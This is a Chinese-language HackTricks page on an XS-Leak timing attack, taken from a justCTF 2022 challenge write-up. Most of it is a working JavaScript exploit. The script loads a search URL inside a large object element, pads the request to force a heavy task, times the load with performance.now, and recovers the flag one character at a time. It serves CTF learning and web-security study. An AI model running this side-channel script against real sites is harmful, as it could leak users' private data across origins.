Chinese - Ht
HackTricks Training Twitter Linkedin Sponsor

performance.now + Force heavy task

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

利用来源于https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/

在这个挑战中,用户可以发送数千个字符,如果包含标志,则字符将被发送回给机器人。因此,通过发送大量字符,攻击者可以测量发送的字符串中是否包含标志。

最初,我没有设置对象的宽度和高度,但后来发现这很重要,因为默认大小太小,无法在加载时间上产生差异。

function leak(char, callback) { return new Promise(resolve => { let ss = 'just_random_string' let url = http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=+ss[Math.floor(Math.random()*ss.length)].repeat(1000000) let start = performance.now() let object = document.createElement('object'); object.width = '2000px' object.height = '2000px' object.data = url; object.onload = () => { object.remove() let end = performance.now() resolve(end - start) } object.onerror = () => console.log('Error event triggered'); document.body.appendChild(object); })

}

send('start')

let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('') let flag = 'justCTF{'

async function main() { let found = 0 let notFound = 0 for(let i=0;i<3;i++) { await leak('..') } for(let i=0; i<3; i++) { found += await leak('justCTF') } for(let i=0; i<3; i++) { notFound += await leak('NOT_FOUND123') }

found /= 3 notFound /= 3

send('found flag:'+found) send('not found flag:'+notFound)

let threshold = found - ((found - notFound)/2) send('threshold:'+threshold)

if (notFound > found) { return }

// exploit while(true) { if (flag[flag.length - 1] === '}') { break } for(let char of charset) { let trying = flag + char let time = 0 for(let i=0; i<3; i++) { time += await leak(trying) } time/=3 send('char:'+trying+',time:'+time) if (time >= threshold) { flag += char send(flag) break } } } }

main()

```

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)
上一页performance.now example下一页Event Loop Blocking + Lazy images

最后更新于